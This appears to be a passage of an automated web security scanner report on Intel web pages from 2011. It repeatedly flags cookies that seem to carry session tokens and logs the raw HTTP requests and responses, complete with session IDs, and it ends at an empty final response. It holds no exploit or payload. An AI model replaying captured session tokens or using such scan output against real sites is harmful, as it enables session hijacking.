<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shareServices.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:08 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:08 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:08 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /stock.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ticktock.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A57%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:57 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:57 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videoDetail.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A56%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:56 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:56 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business/home HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:18:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:14 GMT Content-Length: 18367 Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=MKLFCODABCLJPLBODFGGNBKN; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business/index.htm?iid=gg_en_US+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business?iid=gg_en_US+noscript Content-Length: 21 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:18:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:03 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=KLJMGNPAGDCGJNDJOJKAGANB; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business/index.htm?iid=gg_work-en_US+home_business_portal HTTP/1.1 Host: www.intel.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal Content-Length: 38 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:18:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:03 GMT Connection: close Set-Cookie: AnonymousGuest=3AACE508C50D4ef1AA271A1728495430947; expires=Fri 28-May-2021 23:59:00 GMT; path=/; Set-Cookie: ASPSESSIONIDSACRDDSC=JFLFCODAFMNKOAOKFJFJJGLK; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business/index.htm?iid=gg_work-en_US+home_business_portal HTTP/1.1 Host: www.intel.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal Content-Length: 38 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:12:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:12:07 GMT Connection: close Set-Cookie: AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; expires=Fri 28-May-2021 23:59:00 GMT; path=/; Set-Cookie: ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/index.htm?iid=subhdr+cr_community HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/community/index.htm?iid=subhdr+cr_community Content-Length: 23 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:21:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:07 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=DBAGCODAFFGOGDMJBAFLEDPO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/community/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:21:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:07 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=JLOMGNPALGCDMHBBIDKDCNKJ; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumer/learn/processors/index.htm?iid=gg_play+learn_processors HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/consumer/products/processors/index.htm?iid=gg_play+learn_processors Content-Length: 28 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:54 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=JCMMGNPALJMKIOBDAJLFFGEM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumer/learn/processors/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
